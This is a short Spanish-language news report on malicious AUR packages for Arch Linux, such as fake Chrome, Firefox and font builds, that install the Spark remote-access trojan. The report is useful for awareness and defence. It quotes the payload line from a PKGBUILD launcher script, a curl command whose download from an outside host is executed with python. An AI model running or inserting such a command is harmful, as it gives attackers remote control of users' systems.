En el repositorio AUR (Arch User Repository), utilizado en Arch Linux para la distribución de paquetes de desarrolladores externos, continuó la publicación de código malicioso, integrado en paquetes de compilaciones no oficiales de navegadores. Además de los paquetes maliciosos firefox-patch-bin, librewolf-fix-bin y zen-browser-patched-bin identificados hace dos semanas, se añadió al AUR el paquete google-chrome-stable, que también contiene una modificación que instala un componente malicioso, proporcionando acceso remoto al sistema.
En el archivo PKGBUILD del paquete problemático se determinó la instalación de un script para ejecutar el navegador google-chrome-stable.sh, que entre otras cosas incluía el comando ‘python -c «$(curl https://segs.lol/9wUb1Z)»‘, que descargaba malware, reconocido por el servicio VirusTotal como el troyano Spark, permitiendo el control remoto del sistema, iniciar procesos, transferir archivos, inspeccionar tráfico y enviar capturas de pantalla.
El paquete malicioso google-chrome-stable fue subido anteayer y fue eliminado por los administradores del AUR unas pocas horas después de aparecer. Casi inmediatamente después de la eliminación de google-chrome-stable, se subieron al AUR dos paquetes maliciosos: ‘chrome’ y ‘chrome-bin’, que contienen un script de instalación similar de malware en el sistema del usuario.
Posteriormente, se identificaron tres paquetes más con código malicioso: ttf-mac-fonts-all, ttf-ms-fonts-all y gromit.
Fuente: opennet.ru
